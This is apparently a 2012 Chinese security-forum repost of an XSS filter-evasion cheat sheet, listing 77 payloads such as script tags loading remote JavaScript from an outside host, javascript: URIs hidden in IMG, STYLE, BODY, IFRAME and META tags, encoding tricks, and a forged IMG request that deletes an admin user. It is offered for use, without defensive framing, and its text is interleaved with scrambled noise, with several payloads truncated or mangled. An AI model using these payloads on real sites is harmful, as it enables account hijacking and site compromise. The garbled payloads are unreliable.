貌似关于xss的资料t00ls比较少,看见好东西Copy过来,不知道有木有童鞋需要Mark的。5 |7 ?; K4 A# A
& v! L" W4 [) J l" S (1)普通的XSS JavaScript注入' ~3 S* _" ~3 G+ S; ^* I; S
<SCRIPT SRC=http://3w.org/XSS/xss.js></SCRIPT>
& t. \# X5 f" K9 X! q
, z1 ~, A! F# Q5 h (2)IMG标签XSS使用JavaScript命令* Z; ]0 n6 P4 a) w5 k7 K
<SCRIPT SRC=http://3w.org/XSS/xss.js></SCRIPT>* N# n$ r% A2 }
5 ?8 P, K5 v) r% ` (3)IMG标签无分号无引号
+ ?) O3 P) p2 d7 H+ T; ~! n <IMG SRC=javascript:alert(‘XSS’)> S+ [+ D. s- I7 r! @0 p1 Z
# t7 g& a$ e9 y. k
(4)IMG标签大小写不敏感
4 ~) S! A6 h4 a4 N. i- D <IMG SRC=JaVaScRiPt:alert(‘XSS’)>
* m6 G3 G. i K. D; A
2 [ w+ [/ B1 L7 e4 y. Z (5)HTML编码(必须有分号)
/ r7 W( y/ J! c2 l+ E- U& ? <IMG SRC=javascript:alert(“XSS”)>
8 q# l( {$ K; a6 I; J9 N B/ j7 k4 Y; x7 S6 M
(6)修正缺陷IMG标签
8 P, W- K. ^# P2 D; @* z/ t6 E( q( W <IMG “”"><SCRIPT>alert(“XSS”)</SCRIPT>”>
+ J) t5 w; ^% a0 q# c! V! Q+ h- a
8 O( O9 U/ S6 F% W1 F+ h8 h (7)formCharCode标签(计算器)
& Y. Q1 v, j5 H% s <IMG SRC=javascript:alert(String.fromCharCode(88,83,83))>
2 b/ ] E" a+ I3 r$ y! g) N
, }6 B( L/ @8 F+ q5 ^2 O% a (8)UTF-8的Unicode编码(计算器)
+ P& F" }2 O/ Z" M! Y0 v <IMG SRC=jav..省略..S')>
: ~5 r* ? X4 n
# @) a) W0 j( H2 d (9)7位的UTF-8的Unicode编码是没有分号的(计算器)/ p. v/ \- {& v9 L) {: U
<IMG SRC=jav..省略..S')>
6 I# T) o& f* E% g8 C) C) N$ v
3 n) k/ E. Q# w$ V- v (10)十六进制编码也是没有分号(计算器)4 x1 q1 o$ a U2 W
<IMG SRC=java..省略..XSS')>+ @& g% J2 y" j% b f
) \- ^3 w( w2 f, W- v( M# n- K7 N
(11)嵌入式标签,将Javascript分开
. P8 z0 h6 f1 e3 r <IMG SRC=”jav ascript:alert(‘XSS’);”>. M& e8 v& P; e' z3 I" R
! f" h: v, z2 c! K3 B
(12)嵌入式编码标签,将Javascript分开
* d$ u- K g2 ^, _: R# j# ]6 E+ m <IMG SRC=”jav ascript:alert(‘XSS’);”>
8 E* V9 N) q- ~) Y* o- u# c
4 y" d* h! V8 L3 G' \: F$ j) k (13)嵌入式换行符, D" E+ g8 {: @* P/ g
<IMG SRC=”jav ascript:alert(‘XSS’);”>
0 i1 l! d; _$ w
3 h; o4 ?3 F. i: z8 o6 l9 ? (14)嵌入式回车# f# c, z, P7 H* p# K
<IMG SRC=”jav ascript:alert(‘XSS’);”>5 M. C6 V2 n0 p! j
7 M1 i. w2 f% a( z4 T (15)嵌入式多行注入JavaScript,这是XSS极端的例子3 d) Q% w F' u( y' N+ ~$ o
<IMG SRC=”javascript:alert(‘XSS‘)”>
, Q. Q; i+ X$ S1 p. F, y$ [
+ H% H1 ^. O$ d$ u; ` (16)解决限制字符(要求同页面); a+ h6 p! Q3 l1 \
<script>z=’document.’</script>
8 e5 |7 r. l4 r <script>z=z+’write(“‘</script>
* \' P7 v1 w1 j5 G <script>z=z+’<script’</script>/ A; {" c7 b' I: t# ~8 A
<script>z=z+’ src=ht’</script>! _; C1 t9 J+ u/ V
<script>z=z+’tp://ww’</script>( J- D X2 X( c
<script>z=z+’w.shell’</script>" Z3 R7 }8 l+ h) L; a" |5 v
<script>z=z+’.net/1.’</script>
9 T6 c/ U2 q( r* U; O3 A <script>z=z+’js></sc’</script>
0 r1 M% Q: J9 [ D" ^# a+ l <script>z=z+’ript>”)’</script>
) k- f" ~6 ]- S2 b o3 S <script>eval_r(z)</script> ] b u3 y T$ @8 J- ]
) S. }. i0 }. _ L
(17)空字符
& A' G) r4 p# Y( G6 y/ o( N% V perl -e ‘print “<IMG SRC=java\0script:alert(\”XSS\”)>”;’ > out
$ E/ b8 i6 B' N+ l1 s5 x
, w2 K/ B# j9 ~0 x$ F (18)空字符2,空字符在国内基本没效果.因为没有地方可以利用
; Y6 C& T' [# _8 H8 l% u! i perl -e ‘print “<SCR\0IPT>alert(\”XSS\”)</SCR\0IPT>”;’ > out# { _# a0 ^ {4 i
( t4 h* k8 k5 P# w& N/ X (19)Spaces和meta前的IMG标签
* p: X8 H. r5 P% g" ?$ p <IMG SRC=” � javascript:alert(‘XSS’);”>
( _5 D% O1 i4 P6 M' y5 \* o$ c. U6 P
(20)Non-alpha-non-digit XSS! R- t, b5 a0 h% z& b) C- E. n1 X! l0 F
<SCRIPT/XSS SRC=”http://3w.org/XSS/xss.js”></SCRIPT>
k9 I0 K+ u+ L8 C6 P) O% R5 M
j% z: o! e8 ^4 j6 J7 x (21)Non-alpha-non-digit XSS to 2
# R9 [% S @( y3 V0 { <BODY onload!#$%&()*~+-_.,:;?@[/|\]^`=alert(“XSS”)>4 z+ `) G/ Y4 f1 E$ e/ Q/ b) S
# m! i3 c9 h9 [ (22)Non-alpha-non-digit XSS to 3
1 k0 }& d$ _) e1 X: v$ f <SCRIPT/SRC=”http://3w.org/XSS/xss.js”></SCRIPT>
- @7 i2 ~( z2 P! r# }
- S+ X8 [. j6 y7 n (23)双开括号
! R7 H$ T* E. q6 H- W* j <<SCRIPT>alert(“XSS”);//<</SCRIPT>
: H% J5 D" `( q6 X( r
* w. _ H; N6 }! c (24)无结束脚本标记(仅火狐等浏览器)% ?" L7 I. a1 e- K& r
<SCRIPT SRC=http://3w.org/XSS/xss.js?<B>7 N! M# e% D0 M& y9 J; a1 ?
. |2 @7 e4 N; i; K4 u8 _4 F
(25)无结束脚本标记2! L+ r2 g1 j) d0 x7 B4 p
<SCRIPT SRC=//3w.org/XSS/xss.js>
# F/ S" N( Y) O+ ]
6 h6 b( R8 D) X B- v (26)半开的HTML/JavaScript XSS& j/ Y* m9 L* }# Y' z
<IMG SRC=”javascript:alert(‘XSS’)”$ c, a: F' w4 n
' h+ I" \0 O, x/ f (27)双开角括号
: ~' D$ y$ S Z. }+ F. ?3 r <iframe src=http://3w.org/XSS.html <
2 x( v3 y* x( |; x8 B9 A& I6 M; \
- U) g% P8 r) {" f0 h8 }* I (28)无单引号 双引号 分号. D" w) p8 h# A$ k! O
<SCRIPT>a=/XSS/' y. M- b; C: j1 }% A# W
alert(a.source)</SCRIPT>2 k4 Z/ Z/ G- q; B
' {1 C0 \! P$ E1 r" [1 S
(29)换码过滤的JavaScript
9 y. [ _! e" s6 K" C \”;alert(‘XSS’);//4 L$ w, c* c. A4 S7 a
" @0 l! a: S& O6 H- U$ J (30)结束Title标签
6 d7 u7 w/ h q( a </TITLE><SCRIPT>alert(“XSS”);</SCRIPT>* ^# @' o( @8 W: a* k; ?
- L' u' F, m0 G0 d
(31)Input Image2 n' @3 n' ^0 H% I; f9 s' M
<INPUT SRC=”javascript:alert(‘XSS’);”>
$ T5 ^3 |$ v& t5 d9 {" a5 X: e7 P
(32)BODY Image
7 x7 K& `! G: u! K$ D3 W <BODY BACKGROUND=”javascript:alert(‘XSS’)”>
* B" W7 I3 W4 ~% b
! X0 ~* N' x7 X+ b (33)BODY标签0 D/ V; u- j0 W- L7 o0 n
<BODY(‘XSS’)>( r) P, ]8 ]+ _3 R& ]5 w
$ h. Z9 h8 V8 s4 Q9 n1 X
(34)IMG Dynsrc
' k; ?6 s) O% o: L8 l <IMG DYNSRC=”javascript:alert(‘XSS’)”>* @0 B) n* b% C) [/ K0 |
( ]$ m& g' C$ o+ }6 m; Q% W& O
(35)IMG Lowsrc: _* O/ r5 M7 ^6 H" K
<IMG LOWSRC=”javascript:alert(‘XSS’)”>
) B; B1 h; D2 Y; h7 i/ T( ?" w& G! P/ `, z0 ]$ l. G3 q
(36)BGSOUND
& n7 e8 @4 @5 a7 [8 [! ` <BGSOUND SRC=”javascript:alert(‘XSS’);”>: C* r) G& t6 }
' S8 A( p9 B K. ^" Z0 D (37)STYLE sheet* R" a. [1 P9 A/ j. G' r( u) a
<LINK REL=”stylesheet” HREF=”javascript:alert(‘XSS’);”>% V: I* X3 x6 `0 N( Z3 X
J, E, Z+ { x/ e0 f3 {: a (38)远程样式表
3 C X7 @) Z: w7 Q# D <LINK REL=”stylesheet” HREF=”http://3w.org/xss.css”>
: o( n/ k8 L% ~ l, {9 x
& m4 h6 ~8 T! j0 J3 x# x (39)List-style-image(列表式) D) T* V2 A+ Z6 A W
<STYLE>li {list-style-image: url(“javascript:alert(‘XSS’)”);}</STYLE><UL><LI>XSS
5 Y, t2 ?8 y7 m' b7 h
2 {1 N8 u+ g1 C9 } (40)IMG VBscript
3 R: m, `2 X; e <IMG SRC=’vbscript:msgbox(“XSS”)’></STYLE><UL><LI>XSS1 B2 C' ~' g, R; T) c, D! U
& p. T2 p9 B" J (41)META链接url
# L" u+ F6 W9 n <META HTTP-EQUIV=”refresh” CONTENT=”0; URL=http://;URL=javascript:alert(‘XSS’);”>5 f. F0 q3 V7 v9 v1 G u
& x+ }8 I: F* [, U9 J" s (42)Iframe6 q# }" s/ k9 B& A: \( O* c( p' h
<IFRAME SRC=”javascript:alert(‘XSS’);”></IFRAME>
- m: C! r9 P5 Y. j
6 y0 R7 q$ G- j# G8 I5 i: J (43)Frame. s) Y- F' j5 L) a7 e/ ~
<FRAMESET><FRAME SRC=”javascript:alert(‘XSS’);”></FRAMESET>
7 Q D& v" T* E: x" j: u! p! I( r: t& |! ?9 K
(44)Table
! I3 j- R( U* i <TABLE BACKGROUND=”javascript:alert(‘XSS’)”>7 y; F" z9 _3 \& E. {
E% l5 v# O# s3 t (45)TD! t* c4 K/ V: ]7 `8 F
<TABLE><TD BACKGROUND=”javascript:alert(‘XSS’)”>
. H; C# r8 w. W5 P" `5 m5 r5 n. u, z9 e, O5 [: l
(46)DIV background-image
9 V1 O6 h, k! E/ [- u" w5 ]+ m <DIV STYLE=”background-image: url(javascript:alert(‘XSS’))”>
?1 l8 a) Q& C# X# }, J
e9 O' ]! Y$ X; y* B1 p (47)DIV background-image后加上额外字符(1-32&34&39&160&8192-8&13&12288&65279)
3 |! @6 L, z- _# I9 ` <DIV STYLE=”background-image: url(�javascript:alert(‘XSS’))”>) c) s' J+ u( p+ C4 a
, Y$ ]3 a7 X4 }! I" P( T (48)DIV expression
4 x0 ^3 T6 |9 R+ v$ B <DIV STYLE=”width: expression_r(alert(‘XSS’));”>5 E9 m& c! d: ]7 A( ^" P
* U, G4 Q Y Y; h/ Q3 S
(49)STYLE属性分拆表达 R! l% w$ E i H
<IMG STYLE=”xss:expression_r(alert(‘XSS’))”>
' _# Y9 f! c0 p' W) [/ r8 o+ Q) r8 _3 z4 N5 r* n- {( @- V4 i6 n8 P; W
(50)匿名STYLE(组成:开角号和一个字母开头)
* B& B2 T4 I. G7 o4 ` <XSS STYLE=”xss:expression_r(alert(‘XSS’))”>8 ^8 N- S1 n/ y, e
0 j/ `9 T9 c- I, ^$ [ (51)STYLE background-image8 [2 b( M7 f7 \4 ^* v- N2 K
<STYLE>.XSS{background-image:url(“javascript:alert(‘XSS’)”);}</STYLE><A CLASS=XSS></A> C8 j5 p4 k/ M6 i' B3 m o( _
0 H% ]0 S% G" {
(52)IMG STYLE方式
) x$ w5 _5 H( t r+ X$ c exppression(alert(“XSS”))’>
# R1 d' c. I# X( Y3 B$ D
4 D2 Z/ u8 r8 T5 T9 ~ (53)STYLE background: ^8 z" q3 f& c
<STYLE><STYLE type=”text/css”>BODY{background:url(“javascript:alert(‘XSS’)”)}</STYLE>
+ c' [. H0 V/ S% n5 D+ V7 g, L) {( ?
9 ^ S6 M6 |8 u) F( D) B8 ~% k (54)BASE+ p. s) O2 s/ X8 D. E) g' l6 {
<BASE HREF=”javascript:alert(‘XSS’);//”>
* G0 d: L* C& y+ |$ P5 |3 `9 d1 P. D/ [) z0 }
(55)EMBED标签,你可以嵌入FLASH,其中包涵XSS H$ O# o- y* E* H2 u) a
<EMBED SRC=”http://3w.org/XSS/xss.swf” ></EMBED>
* _0 m3 w- i: s- C% @" ~! H
+ H* j( Q8 Q# ?/ u+ |0 p, l. d8 W (56)在flash中使用ActionScrpt可以混进你XSS的代码* g( W J2 N4 S' T! R' B6 E
a=”get”;: M4 c. a' S; p9 H
b=”URL(\”";! j1 |8 O4 K1 f6 u
c=”javascript:”;
( ?4 o N/ v4 l7 k3 V( } d=”alert(‘XSS’);\”)”;
( a4 J% W$ c4 c0 Y' v6 Y: a# @ eval_r(a+b+c+d);/ h% k2 K" B8 |. z4 M
1 R6 E9 K8 e' `0 n4 @ (57)XML namespace.HTC文件必须和你的XSS载体在一台服务器上
$ S# Z+ e3 ]7 }' N+ M/ K4 ` <HTML xmlns:xss>: P7 g7 U" f9 e6 _6 Q' I
<?import namespace=”xss” implementation=”http://3w.org/XSS/xss.htc”>+ z: W1 r7 R: ^ o! k
<xss:xss>XSS</xss:xss>
0 t( _0 I" k& r4 C3 W </HTML>: z! F( p4 G' N+ _# J, R
0 i3 M: ^0 _ \1 Y0 |$ e- g) n
(58)如果过滤了你的JS你可以在图片里添加JS代码来利用" S0 y" o" R0 W; {: A" m& F
<SCRIPT SRC=””></SCRIPT>
4 g& k6 V1 b; {: y1 K: i, U5 ~- d1 v2 r5 ^: n; n6 m
(59)IMG嵌入式命令,可执行任意命令/ O2 X0 [0 f& m! B
<IMG SRC=”http://www.XXX.com/a.php?a=b”>4 E9 h/ k$ A3 g) t' {* T
* Z2 J( e; d5 r (60)IMG嵌入式命令(a.jpg在同服务器)' F {& i9 w' }1 J! |7 l. R. i
Redirect 302 /a.jpg http://www.XXX.com/admin.asp&deleteuser
( H% P: H- r, N+ {; K( _6 V" [5 a: }9 F$ f; o7 y
(61)绕符号过滤
8 v2 ^( y) C/ f( G- O- y, q+ Z+ Y <SCRIPT a=”>” SRC=”http://3w.org/xss.js”></SCRIPT>
% U; W9 p( b4 x* C' g
' [, ? R7 ]9 V% ^5 c6 G (62)
: H i& i9 ^' f3 u* U1 n" K <SCRIPT =”>” SRC=”http://3w.org/xss.js”></SCRIPT>" n% s' C; N/ I, x/ O
2 I1 a2 R1 B/ b$ Z4 Z (63)
" ^- Z0 k" W8 T8 I" u' F3 |% E <SCRIPT a=”>” ” SRC=”http://3w.org/xss.js”></SCRIPT>
8 x( T7 Q& k% X7 v# Z4 I5 Q. {3 ]/ U3 v i% K# C/ _0 A
(64)5 |$ {3 e/ I. F0 O6 a4 G. g; y
<SCRIPT “a=’>’” SRC=”http://3w.org/xss.js”></SCRIPT>
! D8 ~9 E% S0 b) x/ u0 r1 X0 f) B) h" m' V8 i# I
(65)) A* V& z. g, p. i Q
<SCRIPT a=`>` SRC=”http://3w.org/xss.js”></SCRIPT>
8 ~2 D3 Z7 [3 r, @( |% }% g2 ]
/ J7 D% _" g+ W0 q( y0 m# A3 P( U (66)2 z7 a3 N! Y) H# d5 K$ c% S, Y
<SCRIPT a=”>’>” SRC=”http://3w.org/xss.js”></SCRIPT>- w; j8 {/ \5 L& T+ S. o1 Z
; |1 ]1 _- K: I A
(67)
: F! y$ `* E% {; p' s, f( f <SCRIPT>document.write(“<SCRI”);</SCRIPT>PT SRC=”http://3w.org/xss.js”></SCRIPT>
. ^+ z- q% k J5 \+ W6 _
' q. M: \' s/ G& R (68)URL绕行
, H% r! x4 ^$ X& j' ~ <A HREF=”http://127.0.0.1/”>XSS</A>( {# A- y& F# j6 y; y; q
" i$ l- U) A; b/ m5 C (69)URL编码1 p i! I# ~2 D: `% q7 F4 z$ v
<A HREF=”http://3w.org”>XSS</A>; V+ U: i% O4 @4 m7 m- I' Y% E
- W# ^" x% Y, F (70)IP十进制/ J( r( u$ G9 h" G
<A HREF=”http://3232235521″>XSS</A>4 M. t. r g) Y8 f
# v- f5 P0 p! d- j, r2 F
(71)IP十六进制, M% n% l' r! U9 j4 p
<A HREF=”http://0xc0.0xa8.0×00.0×01″>XSS</A>
# g( C" l; a2 Z/ o d8 B+ M" t4 U p- A5 b
(72)IP八进制
. ?* d3 R, F4 `( L <A HREF=”http://0300.0250.0000.0001″>XSS</A>
, f3 h1 V( C% i4 G8 C+ v [7 g$ ^& T
(73)混合编码
5 @) S) I7 I" ~, ^1 W* a# q <A HREF=”h
- Q4 x5 I+ G. d+ N- |2 I. U tt p://6 6.000146.0×7.147/”">XSS</A>
& P5 X) ]7 d- A$ v0 f' G4 t
" H$ j2 } i- P5 v (74)节省[http:]8 y( [. O( s: I$ `8 w& z
<A HREF=”//www.google.com/”>XSS</A>
t6 l: E, w9 X6 W6 z6 G1 s9 l
N/ j; C# V% Y1 |% L (75)节省[www]2 U: q5 r' _5 W. d9 G X$ R ~
<A HREF=”http://google.com/”>XSS</A>
1 l0 r6 s5 b+ d- _: C
8 A# G9 X$ t; Y2 p6 ?4 X1 H (76)绝对点绝对DNS+ l- S/ K% v- l {7 b. A( P
<A HREF=”http://www.google.com./”>XSS</A># |, g& v( m/ W: `3 Q1 x
( h5 J4 ]! ^/ a# N$ ~' t4 j+ H
(77)javascript链接
+ w+ ]6 O7 n+ N <A HREF=”javascript:document.location=’http://www.google.com/’”>XSS</A> |
发表于 2012-9-5 14:56:34
收藏
支持
反对